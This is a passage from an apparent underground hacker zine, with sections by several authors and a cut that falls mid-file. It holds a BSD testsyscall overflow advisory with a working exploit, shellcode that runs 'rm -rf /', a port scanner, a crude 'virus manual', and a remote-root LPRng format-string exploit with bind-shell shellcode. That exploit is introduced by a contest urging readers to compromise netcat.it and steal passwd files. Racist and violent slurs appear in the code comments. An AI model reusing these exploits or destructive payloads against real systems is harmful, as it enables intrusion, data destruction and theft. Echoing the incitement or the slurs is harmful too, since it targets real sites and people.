`-.____________________________________.-' Exploit for every BSD (local). That includes *YOU* OpenBSD. [BEGIN_DIR] testsyscall [CUT_HERE] testsyscall.adv - HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % - | www.hackphreak.org | | | | Version : Hackphreak advisory #1 of many | | Author : RLoxley | | Contributed : shinex@suburbs.net | | Topic : A user may become that of another user via "testsyscall" | | Or gain remote access via "testsyscall" | | Program : /usr/share/lkm/test/testsyscall.c - testsyscall | | Released : June the 9th, 2000 | | Credits : www.hackphreak.org, www.condemned.org, EHAP, PARSE, | | our friends at packetstorm :) | | Corrected : See below. | | Vender status : Notified | - HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % - Preface: -------- I, RLoxley, am writing this advisory. It was not my intention to release an actual working exploit with this advisory. Although, my friend shinex (currently working his way up team hackphreak ;) hey xf0rce!) insisted on including one. I, do not endorse script kiddism, please read some of my ethics articles at hackphreak.org (hackphreak.org/newbie). "Ethics can take you a long long way" -- RLoxley Background information: ----------------------- "testsyscall" was written to test out a special syscall LKM - (LOADABLE KERNEL MODULE). It can be piped via the "inetd" daemon, or run as regular. Problem description: -------------------- testsyscall uses standard input, it parses a system call number, and executes that syscall with the syscall() function. The syscall number, in the test, is that of the loaded module's syscall entry. When reading standard input from the user, testsyscall DOES NOT CHECK bounds. The internal buffer that data is copied to, is only 80 bytes. gets() returns when a newline is encountered. A malicious use can write a trivial exploit within a matter of a few minutes. By typing input longer than 80 bytes, one can overflow the internal buffer. By supplying specially crafted shellcode, one can exploit testsyscall. # ./testsyscall Table offset as reported by modstat: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Bad system call (core dumped) # gdb ./testsyscall ./testsyscall.core GNU gdb 4.17 #0 0x40019c11 in ?? () from /usr/lib/libc.so.12.40 (gdb) bt #0 0x40019c11 in ?? () from /usr/lib/libc.so.12.40 #1 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb) As you can see, we've completely over written the Program Counter. Here is where the vulnerability is encountered * $NetBSD: testsyscall.c,v 1.2 1997/10/13 11:20:53 lukem Exp $ */ #include <stdio.h> main() { char buf[ 80]; int err = 0; printf( "Table offset as reported by modstat: "); if( gets( buf) == NULL) { printf( "[ABORT]\n"); exit( 1); } For an in-depth analysis of gets(), look below. Notice how gets() is being used very unsafe. I can't believe developers at OpenBSD, NetBSD, FreeBSD, would allow such an idiotic programming error. Maybe Team Hackphreak could participate in your ports auditing mission ;). Problem description of gets(): ------------------------------ gets() is very unsafe. gets() does not check the length of the input against the internal buffer memory area. A secure programmer should use fgets(), or fgetc() in a loop(). Impact: ------- A malicious user may gain access to a xBSD server remotly, if testsyscall is running off inetd. A malicious user may crash the testsyscall service if running off of inetd. A malicious user may gain higher level access than which he or she has had before by exploiting testsyscall. Please do not assume a 'malicious user' means someone trusted on the system. This testsyscall vulnerabilty can be used in the 'hacker-walk-the-chain' penetration method. Also, one may crash the server, via giving the input a non-number, which will cause a system call crash core dump. Workaround: ----------- Install the patch below. # cat hp_testsyscall_patch.diff 49c49 < if( gets( buf) == NULL) { --- > if( fgets( buf, 50, stdin) == NULL) { Exploit: -------- In such a short notice, shinex put this together. We thank him from team hackphreak. // testsyscall.c exploit by shinex // made for rlox #include <stdio.h> #include <stdlib.h> #include <unistd.h> char shellcode[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; unsigned long get_esp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char **argv) { FILE * pi; char *buf,*p; unsigned long *adr; int i,off; if(argc < 2) { puts("usage, testsyscallexploit \"path_to_testsyscall\" \"optional_offset\""); exit(-1); } if (argc>2) off=atoi(argv[2]); else off=4; printf("using buffer delta:%d\n",off); if((p = buf = malloc(2268+28+off))==NULL) exit(-1); memset(p, 0x90, 2268+off); p += 2268+off - strlen(shellcode); for(i = 0; i < strlen(shellcode); i++) *p++ = shellcode[i]; adr = (long *)p; for(i = 0; i < 7; i++) *adr++ = get_esp(); p = (char *)adr; *p = 0; pi = popen(argv[1], "w"); if(pi == NULL) { perror("popen"); exit(-1); } *p = '\n'; *(p+1) = '\0'; if(fwrite(buf, strlen(buf), 1, pi)<0) { perror("fwrite"); exit(-1); } //execl(argv[1], argv[1],buf, NULL); } Source: ------- To examine and learn /* * testsyscall.c * * Test program to call the sample loaded system call. * * 23 May 93 Terry Lambert Original * * * Copyright (c) 1993 Terrence R. Lambert. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Terrence R. Lambert. * 4. The name Terrence R. Lambert may not be used to endorse or promote * products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY TERRENCE R. LAMBERT ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE TERRENCE R. LAMBERT BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: testsyscall.c,v 1.1.1.1 1995/10/18 08:44:21 deraadt Exp $ */ #include <stdio.h> main() { char buf[ 80]; int err = 0; printf( "Table offset as reported by modstat: "); if( gets( buf) == NULL) { printf( "[ABORT]\n"); exit( 1); } if( err = syscall( atoi( buf) /* no arguments*/)) perror( "syscall"); exit( err); } /* * EOF -- This file has not been truncated */ GREETS: ------- team hackphreak, EHAP, condemnation, lore, shinex, rhino9, and of course, packetstorm TO HELL WITH YOU'S: ------------------- Paedophiles, rascists, all of #kkk on undernet, all the people who disturb my channel, BoW, frys / prophet [END_CUT] testsyscall.adv [END_DIR] testsyscall ____________________________________ .-' `-. [11]| rm -rf / sh3llk0dez |[11] [11]| by: |[11] [11]| str8 phr0m the s3w3r! |[11] `-.____________________________________.-' th3ze k0dez r br0ught to uz by 0ur de4l p4l str8 phr0m th3 s3w3r. uze w1th cuati0n. put th3m in all y0r expl0itz and d1str0 W0RLDW1DE. 0k n0w g00d luq rm'n b0x3z. [BEGIN_DIR] misc [CUT_HERE] rmsh3llk0dez // ~el8 sh3llk0de: t3st3d 0n linux 2.2.s0meth1ng // sh0uld b ez t0 p0rt t0 y0r f4v0r1te arch1tecture lyke // dre4msc4pe or s0me shyt. uz3 w1th c4re th1s w1ll rm th3 // b0x. iph u re4lly w4nn4 g0 h4rdk0re, exec sh w1th rm -rf // and put 1t in the b4ckgr0und. th1s is l3ft t0 the av1d // re4der. n0te, uze a n1ce ebp or wh4tevr th4t 1z. unsigned char ev1lrmb0xk0d3[] = "\xeb\x44" // ~el8 taken 0ver -- 2001 "FAREWELL_MOTHERFUCKER!:>" // f1ght the p0wer -- 2001 "\x99" // k1ll whitey -- 2001 "\x89\xd0" // bl4q p0wer -- 2001 "\xb0\x17" // h4il w1po -- 2001 "\x89\xd3" // r1p k0dez -- 2001 "\xcd\x80" // terr0riz old l4diez X'n the stre4t -- 2001 "\x5b" // g3t l4id -- 2001 "\xb0\x0b" // rm s0me mfq'n b0xez -- 2001 "\x88\x53\x07" // KILL THE BOX "\x88\x53\x0b" // MAKE IT DEAD "\x88\x53\x0d" // STRANGLE THE BOX "\x89\x5d\xf0" // MAKE IT DEAD "\x8d\x4b\x08" // KILL THE ADMIN "\x89\x4d\xf4" // MAKE HIM DEAD "\x8d\x4b\x0c" // RM THE BOX "\x89\x4d\xf8" // MAKE IT CRY "\x89\x55\xfc" // BEAT THE ADMIN "\x8d\x4d\xf0" // MAKE HIM HIDE "\xcd\x80" // SAY FAREWALL "\xe8\xcf\xff\xff\xff" // NOW THE BOX HAZ DIED "/bin/rmX-rfX/X" // poem -- ~el8[2001] ; [END_CUT] rmsh3llk0dez [END_DIR] misc ____________________________________ .-' `-. [12]| slowscan.c |[12] [12]| by: |[12] [12]| hybrid |[12] `-.____________________________________.-' Coded for phrack55, yet not included. [BEGIN_DIR] misc [CUT_HERE] slowscan.c /* * slowscan.c * * by hybrid [proof of concept code] */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <netinet/in.h> int main(int argc, char * argv[]) { struct sockaddr_in sin; int fd,i,max=65535; fd=socket(AF_INET,SOCK_STREAM,0); if(fd<0) puts("error"),exit(-1); sin.sin_family=AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); for(i=0;i<=max;i++) { sleep(atoi(argv[2])*1440); sin.sin_port=htons(i); if(connect(fd,(struct sockaddr *)&sin,sizeof(sin))<0) continue; else printf("port %i is open!\n", i); } close(fd); return(0); } [END_CUT] slowscan.c [END_DIR] misc ____________________________________ .-' `-. [13]| putpenis.c |[13] [13]| by: |[13] [13]| FUNNY__BUNNY |[13] `-.____________________________________.-' This was coded while @ CCC camp: [BEGIN_DIR] homosexual [CUT_HERE] putpenis.c #include <stdio.h> #include <string.h> void putpenis(char *str) { fprintf(stderr, "\r%s", str); usleep(rand()%60000+30000); return; } int main(int argc, char **argv) { printf("watch %s's ass get owned by %s!!\n",(argc>1)?argv[1]:"route", (argc>2)?argv[2]:"cripto"); while(1) { putpenis("8====D (_O_)"); putpenis(" 8====D(_O_)"); putpenis(" 8====D_O_)"); putpenis(" 8====DO_)"); putpenis(" 8====D_)"); putpenis(" 8====_)"); putpenis(" 8===_)"); putpenis(" 8====_)"); putpenis(" 8====D_)"); putpenis(" 8====D_O_)"); putpenis(" 8====D(_O_)"); } return 0; } [END_CUT] putpenis.c [END_DIR] homosexual ____________________________________ .-' `-. [14]| THE UNIX VIRUS CHILDRENS MANUAL |[14] [14]| by: |[14] [14]| silvio |[14] `-.____________________________________.-' [BEGIN_DIR] misc [CUT_HERE] virus.txt THE UNIX VIRUS CHILDRENS MANUAL - Silvio Cesare <silvio@big.net.au> CONTENTS -------- IMPROVING THIS MANUAL WHAT IS A VIRUS? WHAT CAN A UNIX VIRUS DO? WHAT CAN A WINDOWS VIRUS DO? WHAT DO UNIX VIRUS'S LOOK LIKE? IMPROVING THIS MANUAL --------------------- For any comments or suggestions (even just to say hi) please contact the author Silvio Cesare, <silvio@big.net.au>. This paper already has future plans to include more parasite descriptions and more parasite teqniques. Plus, i plan on writing a POP-UP book about virus's and how wonderful virus's are. WHAT IS A VIRUS? ---------------- A virus is code that infects program files, critical files, processes, ELF's, and mission critical data. Here are some pictures to help you :) (Parents: please take time to discuss the pictures, preferably to keep them from getting scared) A WAREZ infector (The BoW virus): _||||||||||||||||||||||||_ / \ / \_/ \ | \____ _____/ | | / o /\ /\ o \ | | \___/ \___/ | | /\ | \ ______________________ / \_ .____| | | |____. _/ \ |___| |___| / \______________________/ _____| |_____ / \ | | | / __________ \ | |\/\/\| I LUV BOW! |\/\/\| | ~~~~~~~~~~ | | | < > ( b0rn 2 1nf3ct! ) \__________________/ Notice, the very sharp hands, and very big head, which contains millions and zillions of program code to infect your system and make it sick. An ELF infector virus (Clifford The Big Red Virus): /-------------\ | , | | O ^ o | [| M |] | U | \___________/ | | | | | | / \ \ \ \ / \ / \ |/ \ | \ \ | \|\ // | \ / \ / \ \ / \ Notice it's U shaped mouth, which acts as a suction cup. Also, notice its many many tenticles! They are used to spread throughout your system very very quickly, and can cause it to instantly die! This is a naughty virus. One drawback of this virus, is it is: 1) Very hard to program 2) Has poor eye site (notice there are no pupils) A windows virus (The BLOB!): _____________________________ ( ) ( ) ( Memo to Sandy: ) ( Hey Sandy ............. ) ( ) (!!!!!!!!!!!!!!!!!!!!!!!!!!!!!) ( O o O o O o O o O o O o O o ) ( o O o O o O o O o O o O o O ) ( O o O O o o O o o O O o O o ) ( \/\/ \/\/\/\/ \/\/ \/\/\/ \/) ( @ ) ( /\ /\/\/\ /\/\/\/\ /\/\/\/\ ) ( O o O o O o O o O o O o O o ) ( o O o O o O o O o O o O o O ) ( O o O O o o O o o O O o O o ) (!!!!!!!!!!!!!!!!!!!!!!!!!!!!!) ( ) ( Aol, no wonder it's #1 ) ( Text file! ) (_____________________________) This virus is very hard to detect. Notice how the nasty mean angry part of the virus is in the middle, while outside of the virus, it just looks like a regular file! This virus has many eyes, and viscious teeth! It can trick Norton's, and so forth. The gH virus (LamegHost): , ; , .-'"""'-. , ; , \\|/ .' '. \|// \-;-/ .. \-;-/ // ; ; \\ //__; :. .; ;__\\ `-----\'.'-.....-'.'/-----' '.'.-.-,_.'.' '( (..-' '-' This virus turns your operating system into a flood network, to DoS people on irc, it also downloads rootshell.com and hack.co.za directly to your box, and then loads a backdoor into every daemon in inetd. Very naughty virus, it was used on whitehouse.gov. That sums up the intro, on to WHAT CAN A UNIX VIRUS DO? WHAT CAN A UNIX VIRUS DO? -------------------- Virus's are very fascinating, their very existance is superior to that of the mind controling human. A UNIX virus can do basically anything with the correct privledges. ME UNIX o o <- [ Can i have ] 01010101010100 -> [ Why yes ] _\ [ ROOT access] 01010101010100 [ you may.] . . [ please ? ] 01010101010101 \____/ 01010101010011 01010110101010 Once you have the correct permissions, here's what you can do: Infect many processes on the system: _____ .' '. / O o \ | | | \ / | \ '---' / '._____.' _____ _____ .' '. .' '. / O o \ / o O \ | | | | | \ / | | \ / | \ '---' / \ '---' / '._____.' '._____.' _____ _____ _____ .' '. .' '. .' '. / O o \ / O O \ / o O \ | | | | | | | \ / | | \ / | | \ / | \ '---' / \ '---' / \ '---' / '._____.' '._____.' '._____.' _____ _____ _____ _____ .' '. .' '. .' '. .' '. / o o \ / o O \ / O o \ / o o \ | | | | | | | | | \ / | | \ / | | \ / | | \ / | \ '---' / \ '---' / \ '---' / \ '---' / '._____.' '._____.' '._____.' '._____.' This shows how the virus's spread. Look at each ones eyes, they differ from the other. This is what we call maximum stealthism! It makes it hard for virus detectors to find the virus's. Backdoor the systems: (telnet system 31337) (*:backdoor LISTEN) hacker system O -> [] -> |----| < | - | |\ |____| A hacker (yourself) can gain access to a system, and run even more virus. Running many virus's is called a "parade" amongst us virus writers. Destroy your system: $ ls fork():unable to fork new process THE SANDMAN VIRUS HAS YOUR WEAK SOUL THE SANDMAN VIRUS HAS YOUR WEAK SOUL THE SANDMAN VIRUS HAS YOUR WEAK SOUL THE SANDMAN VIRUS HAS YOUR WEAK SOUL THE SANDMAN VIRUS HAS YOUR WEAK SOUL THE SANDMAN VIRUS HAS YOUR WEAK SOUL Rewriting MBR...done Removing init...done Removing /usr/bin/printf..............done Rebooting! This virus hides, waiting, forever if it hasto, then, when all recources are used up, BAM!!!!!!!!!!!! IT DESTROYS YOUR SYSTEM. Expose you to vile paraphanalia: @@@ @. .@ @\=/@ .- -. o /(.|.)\ | \ ).( / 8======D~~ '( v )` |\ \|/ (|) '-` This virus randomly prints pornographic ascii images to your console. In conclusion, a unix virus can do anything to your system. Onto the next section WHAT CAN A WINDOWS VIRUS DO? WHAT CAN A WINDOWS VIRUS DO --------------------------- Windows95/98 VIRII are very different from UNIX VIRII (VIRII meaning VIRUS plural). The most popular of Windows95/98 VIRII can be found at www.virusexchange.com. Some examples of what Windows VIRII can do are: Mess with financial software databses like the Divinci virus. Delete all of your HTTP cookies. Delete your system using the deltree command. Run netbus or back orifice on your system, and make it impossible to remove. Make copies of itself, go into stealth mode, and permutate ( increase their existance ) themselves like rabbits onto your system. Alter the memory of another process on your system. ex: Altering notepad when writing critical notes to your friends in elementary school. Get all of the buddies on your buddy list and send them the trojan, this happened with the famous internet worm by Robert Morris. Turn your system into a WAREZ server. Get credit card information for your system. Change your bootup system image (to a pornagraphic one, you will likely get grounded, happyhacker.org teaches you howto do this). Change the shutdown system image (to a pornagraphic one, you will likely get grounded, happyhacker.org teaches you howto do this). Make really loud annoying sounds at night. Ok, that is the end of this section, onto WHAT DO UNIX VIRUS'S LOOK LIKE? Parents: Review this material with your children, three times through. WHAT DO UNIX VIRUS'S LOOK LIKE? ------------------------------- Unix virii are hard to spot, this section gives you some info on howto spot them and write them for fun. Smiley the Virus: _____ .' '. / O o \ | | | \ / | \ '---' / '._____.' Dalnet, the Virus: @@@ @. .@ @\=/@ .- -. o /(.|.)\ | \ ).( / 8======D~~ '( v )` |\ \|/ (|) '-` (NOTE: This is how DALNET got its name) The gH virus (LamegHost): , ; , .-'"""'-. , ; , \\|/ .' '. \|// \-;-/ .. \-;-/ // ; ; \\ //__; :. .; ;__\\ `-----\'.'-.....-'.'/-----' '.'.-.-,_.'.' '( (..-' '-' (NOTE: Used in the incredible whitehouse.gov defacement) An ELF infector virus (Clifford The Big Red Virus): /-------------\ | , | | O ^ o | [| M |] | U | \___________/ | | | | | | / \ \ \ \ / \ / \ |/ \ | \ \ | \|\ // | \ / \ / \ \ / \ A WAREZ infector (The BoW virus): _||||||||||||||||||||||||_ / \ / \_/ \ | \____ _____/ | | / o /\ /\ o \ | | \___/ \___/ | | /\ | \ ______________________ / \_ .____| | | |____. _/ \ |___| |___| / \______________________/ _____| |_____ / \ | | | / __________ \ | |\/\/\| I LUV BOW! |\/\/\| | ~~~~~~~~~~ | | | < > ( b0rn 2 1nf3ct! ) \__________________/ Enourmous Penis Virus (Aka, Big John): 8===================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================D (NOTE: This virus fills up your file system, quickly) The Million Man March (Aka Lots`o`penis): 8========D~~~ 8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ (NOTE: This virus fills up NFS nodes) See you next time! And remember, VIRII ARE FUN! :-D [END_CUT] virus.txt [END_DIR] misc ____________________________________ .-' `-. [15]| SUPER K0DE R1PP1NG |[15] [15]| by: |[15] [15]| ~el8 |[15] `-.____________________________________.-' the f1rst pers0n t0 rm www.netcat.it and n0tify ~el8 0f the rm1ng w1nz some pr1zes. rec3ntly www.netcat.it r1pped an expl0it and p0st3d f0r themselvez 0n vuln-dev and 0n their g4y asS s1te. h3r3 @ ~el8, we r c0nduct1ng a g4me. a c0nt3st iph y0u w1ll. f1rst pers0n t0 rm netcat.it and n0tify uz via em4il w1nz 2 0d4y k0dez. we w0uld lyke s0me l0gz 0f the b0x etc, th1s w1ll b put in the n3xt ~el8. l0gz c0uld b lyke, passwd f1le, /etc all arch1ved up etcetc. the k0untd0wn beg1nz as s00n as ~el8 h1tz the stre4tz. s0 hurry the fuk up, w4r3z aw4itz y0u. als0, th3r3 iz n0 l1mit 0n h0w m4ny timez netcat.it iz rm'd. we als0 w1ll b accept1ng 0ther b0xez belonging t0 netcat.it being rm'd, but th1s w1ll result in 1 0d4y k0dez, n0t 2. h4ve phun, and l3t the g4ymez beg1n. [BEGIN_DIR] ripped_k0dez [CUT_HERE] rm_netcat.it.c // bl4t4ntly r1pped fr0m an0ther expl0it /* * * www.netcat.it Presents: LPRng/Linux remote root lpd exploit. * * NetCat.it - admin@netcat.it * * Please Sysadmin Patch your Box! * Please RedHat.com, release a patch! * * Run: ./SEClpd victim brute -t type * Try first ./SEClpd victim -t 0 then try the brute. * * This exploit can be download from www.netcat.it * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #define ADDRESS_BUFFER_SIZE 32+4 #define APPEND_BUFFER_SIZE 52 #define FORMAT_LENGTH 512-8 #define NOPCOUNT 200 #define SHELLCODE_COUNT 1030 #define DELAY 50000 /* usecs */ #define OFFSET_LIMIT 5000 char shellcode[] = "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; struct target { char *os_name; u_long eip_address; u_long shellcode_address; unsigned int position; int written_bytes; int align; }; struct target targets[] = { { "RedHat 7.0 - Guinesss ", 0xbffff3ec, 0L, 300, 70, 2, }, { "RedHat 7.0 - Guinesss-dev", 0xbffff12c, 0L, 300, 70, 2, }, { NULL, 0L, 0L, 0, 0, 0 } }; static char address_buffer[ADDRESS_BUFFER_SIZE+1]; static char append_buffer[APPEND_BUFFER_SIZE+1]; static char shellcode_buffer[1024]; static char *hostname=NULL; static int offset; static struct hostent *he; int type=-1; int brute=-1, failure=1; void calculate_rets(u_long eip_addr, u_long shellcode_addr, u_int previous, u_i nt addr_loc) { int i; unsigned int tmp = 0; unsigned int copied = previous; unsigned int num[4] = { (unsigned int) (shellcode_addr & 0x000000ff), (unsigned int)((shellcode_addr & 0x0000ff00) >> 8), (unsigned int)((shellcode_addr & 0x00ff0000) >> 16), (unsigned int)((shellcode_addr & 0xff000000) >> 24) }; memset (address_buffer, '\0', sizeof(address_buffer)); memset (append_buffer, '\0', sizeof(append_buffer)); for (i = 0; i < 4; i++) { while (copied > 0x100) copied -= 0x100; if ( (i > 0) && (num[i-1] == num[i]) ) sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i); else if (copied < num[i]) { if ( (num[i] - copied) <= 10) { sprintf (append_buffer+strlen(append_buffer), "%.*s", (int)(num[i] - copied), "www.netcat.it"); copied += (num[i] - copied); sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i) ; } else { sprintf (append_buffer+strlen(append_buffer), "%%.%du", num[i] - copied); copied += (num[i] - copied); sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i) ; } } else { tmp = ((num[i] + 0x100) - copied); sprintf (append_buffer+strlen(append_buffer), "%%.%du", tmp); copied += ((num[i] + 0x100) - copied); sprintf (append_buffer+strlen(append_buffer), "%%%d$n", addr_loc+i); } sprintf (address_buffer+strlen(address_buffer), "%c%c%c%c", (unsigned char) ((eip_addr+i) & 0x000000ff), (unsigned char)(((eip_addr+i) & 0x0000ff00) >> 8), (unsigned char)(((eip_addr+i) & 0x00ff0000) >> 16), (unsigned char)(((eip_addr+i) & 0xff000000) >> 24)); } while (strlen(address_buffer) < ADDRESS_BUFFER_SIZE) strcat (address_buffer, "X"); #ifdef DEBUG printf ("\nGeneration complete:\nAddress: "); for (i = 0; i < strlen(address_buffer); i++) { if ( ((i % 4) == 0) && (i > 0) ) printf ("."); printf ("%02x", (unsigned char)address_buffer[i]); } printf ("\nAppend: %s\n", append_buffer); #endif return; } char *create_malicious_string(void) { static char format_buffer[FORMAT_LENGTH+1]; long addr1,addr2; int i; memset (format_buffer, '\0', sizeof(format_buffer)); targets[type].shellcode_address = targets[type].eip_address + SHELLCODE _COUNT; addr1 = targets[type].eip_address; addr2 = targets[type].shellcode_address; calculate_rets (addr1, addr2,targets[type].written_bytes, targets[type].posit ion); (void)snprintf (format_buffer, sizeof(format_buffer)-1, "%.*s%s", targets[type].align, "BBBB", address_buffer); strncpy (address_buffer, format_buffer, sizeof(address_buffer)-1); strncpy (format_buffer, append_buffer, sizeof(format_buffer)-1); for(i = 0 ; i < NOPCOUNT ; i++) strcat(format_buffer, "\x90"); strcat(format_buffer, shellcode); return (format_buffer); } int connect_victim() { int sockfd, n; struct sockaddr_in s; fd_set fd_stat; char buff[1024]; static char testcmd[256] = "/bin/uname -a ; id ;\r\n"; s.sin_family = AF_INET; s.sin_port = htons (3879); s.sin_addr.s_addr = *(u_long *)he->h_addr; if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) { printf ("--- [5] Unable to create socket!\n"); printf("Exploit failed!\n"); return -1; } if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0) { return -1; } if(brute) printf("+++ The eip_address is 0x%x\n\n", targets[type].eip_address); printf("- [+] shell located on %s\n", hostname); printf("- [+] Enter Commands at will\n\n"); failure = -1; FD_ZERO(&fd_stat); FD_SET(sockfd, &fd_stat); send(sockfd, testcmd, strlen(testcmd), 0); while(1) { FD_SET(sockfd,&fd_stat); FD_SET(0,&fd_stat); if(select(sockfd+1,&fd_stat,NULL,NULL,NULL)<0) break; if( FD_ISSET(sockfd, &fd_stat) ) { if((n=read(sockfd,buff,sizeof(buff)))<0){ fprintf(stderr, "EOF\n"); return 2; } if(write(1,buff,n)<0)break; } if ( FD_ISSET(0, &fd_stat) ) { if((n=read(0,buff,sizeof(buff)))<0){ fprintf(stderr,"EOF\n"); return 2; } if(send(sockfd,buff,n,0)<0) break; } } } void send_code(char *exploit_buffer) { int sockfd, n; struct sockaddr_in s; fd_set fd_stat; char recv[1024]; static char testcmd[256] = "/bin/uname -a ; id ;\r\n"; s.sin_family = AF_INET; s.sin_port = htons (515); s.sin_addr.s_addr = *(u_long *)he->h_addr; if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) { printf ("--- [5] Unable to create socket!\n"); printf("Exploit failed!\n"); exit(-1); } if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0) { printf ("--- [5] Unable to connect to %s\n", hostname); printf("Exploit failed, %s is not running LPD!\n", hostname); exit(-1); } usleep(DELAY); if(write (sockfd, exploit_buffer, strlen(exploit_buffer)) < 0) { printf ("Couldn't write to socket %d", sockfd); printf ("Exploit failed\n"); exit(2); } close(sockfd); connect_victim(); } void usage(char *program) { int i=0; printf("SEClpd by www.netcat.it ! \n\n"); printf("Usage: %s victim [\"brute\"] -t type [-o offset] [-a align] [-p posi tion] [-r eip_addr] [-c shell_addr] [-w written_bytes] \n\n", program); printf("ie: ./SEClpd localhost -t 0 For most redhat 7.0 boxes\n"); printf("ie: ./SEClpd localhost brute -t 0 For brute forcing all redhat 7.0 b oxes\n"); printf("Types:\n\n"); while( targets[i].os_name != NULL) printf ("[ Type %d: [ %s ]\n", i++, targets[i].os_name); } int main(int argc, char **argv) { char exploit_buffer[1024]; char *format = NULL; int c, brutecount=0; if(argc < 3) { usage(argv[0]); return 1; } hostname = argv[1]; if(!strncmp(argv[2], "brute", 5)) brute = 1; while(( c = getopt (argc, argv, "t:r:c:a:o:p:w:k"))!= EOF){ switch (c) { case 't': type = atoi(optarg); break; case 'r': targets[type].eip_address = strtoul(optarg, NULL, 16); break; case 'c': targets[type].shellcode_address = strtoul(optarg, NULL, 16); break; case 'a': targets[type].align = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case 